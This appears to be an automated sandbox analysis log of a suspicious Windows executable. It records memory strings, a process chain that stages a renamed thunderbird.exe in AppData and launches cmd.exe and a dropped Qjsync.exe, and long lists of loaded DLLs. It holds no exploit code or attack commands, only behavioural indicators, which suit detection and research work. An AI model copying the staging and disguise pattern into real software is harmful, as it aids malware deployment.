Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name, %d+18,10) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#0,%Q);
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence';
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: UolJwovI8c.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: UolJwovI8c.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls

Source: C:\Users\user\Desktop\UolJwovI8c.exe

File read: C:\Users\user\Desktop\UolJwovI8c.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UolJwovI8c.exe "C:\Users\user\Desktop\UolJwovI8c.exe"
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Process created: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe "C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe" -burn.clean.room="C:\Users\user\Desktop\UolJwovI8c.exe" -burn.filehandle.attached=684 -burn.filehandle.self=512
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Process created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe "C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe"
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Process created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Qjsync.exe C:\Users\user\AppData\Local\Temp\Qjsync.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe "C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe"
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe "C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe"
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Qjsync.exe C:\Users\user\AppData\Local\Temp\Qjsync.exe
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Process created: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe "C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe" -burn.clean.room="C:\Users\user\Desktop\UolJwovI8c.exe" -burn.filehandle.attached=684 -burn.filehandle.self=512	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Process created: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe "C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe"	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Process created: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Qjsync.exe C:\Users\user\AppData\Local\Temp\Qjsync.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\Qjsync.exe C:\Users\user\AppData\Local\Temp\Qjsync.exe	Jump to behavior

Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UolJwovI8c.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: js3250.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: xpcom_core.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: smime3.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: ssl3.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: nsldap32v50.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: nsldappr32v50.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: xpcom_compat.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: softokn3.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: js3250.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: smime3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: ssl3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldap32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldappr32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_compat.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: softokn3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: js3250.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: smime3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: ssl3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldap32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldappr32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_compat.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: softokn3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
